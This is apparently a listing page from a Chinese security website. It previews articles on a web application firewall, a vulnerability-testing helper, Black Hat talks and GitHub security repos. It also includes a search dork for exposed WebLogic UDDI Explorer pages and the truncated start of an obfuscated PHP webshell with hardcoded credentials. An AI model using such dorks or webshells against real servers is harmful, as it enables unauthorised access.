Category: Page containing log in portal & Web Server Detection Description: This dork allows user to access default page of Oracle Weblogic Server - UDDI Explorer. Some of scanner tools would detect SSRF vulnerability for weblogic uddi explore...
ngx_lua_waf:一个基于OpenResty(Nginx+Lua)的web应用防火墙
- 2019-07-06
- 安全工具
- 4376 阅读
ngx_lua_waf web应用防火墙 ngx_lua_waf是一个基于OpenResty(Nginx+Lua)的web应用防火墙。而ngx_lua是一种可以把lua语言嵌入nginx中,使其支持lua来快速开发基于nginx下的业务逻辑的技术。 实现功能 防止sql注入,本地包含,部分溢出,fuzzing测试,xss,SSRF等web攻击防止svn/备份之类文件泄漏防止ApacheBench之类压力测试工...
VTest – 漏洞测试辅助系统
- 2019-04-25
- 安全工具
- 3907 阅读
VTest介绍 用于辅助安全工程师漏洞挖掘、测试、复现,集合了mock、httplog、dns tools、xss,可用于测试各类无回显、无法直观判断或特定场景下的漏洞,例如:存储型xss、ssrf、远程代码执行/注入、远程命令执行/注入、文件包含等。 VTest特点 使用方便,集成常用的辅助功能零部署难度,python环境中直接运行即可 VTest功能 M...
inurl="/uddiexplorer/SetupUDDIExplorer.jsp"
- 2018-10-17 shdb
- 2399 阅读
Category: Page containing log in portal & Web Server Detection Description: This dork allows user to access default page of Oracle Weblogic Server - UDDI Explorer. Some of scanner tools would detect SSRF vulnerability for weblogic uddi explore...
Blackhat2016第二天部分精彩议题介绍(含PPT下载)
- 2016-08-13
- 业界
- 2378 阅读
blackhat usa 2016第二天的议题 想下载PPT的来这里 官方下载地址:https://www.blackhat.com/us-16/briefings.html 国内镜像地址:http://yunpan.cn/c6egtYI6ceHbQ (提取码:f816) 议题:WINDOWS 10 MITIGATION IMPROVEMENTS (Windows 10的利用缓解的改善) 演讲内容: 在过去10年里,微软一直在改善安全,使得有效的漏洞利用越来越难,花...
Github 安全类Repo收集整理
- 2016-08-09
- 安全工具
- 5682 阅读
刚好这两天对之前github上关注的一些比较有意思的项目进行了一下分类整理,在这里列出来分享给大家,希望能对大家寻找工具或者资源有所帮助。 大部分Repo是关于网络安全以及Python的,也有一些其他主题的项目,有很多我都没有用过,关于项目的功能概括如果写的有不对的地方,还请大家多多包涵,给予指正。 欢迎组团欢迎一起学习交流!转载请...
BNKQbAKQ webshell
- 2015-10-26
- webshell
- 9267 阅读
PHP <?php /** * Created by uedbox.com. * User: hackgyj * Date: 15/10/27 * Time: 上午9:30 */ $user = "Anarchy"; $pass = "Chaos"; function zWM( $NXlKO ) { $NXlKO = gzuncompress( base64_decode( $NXlK...
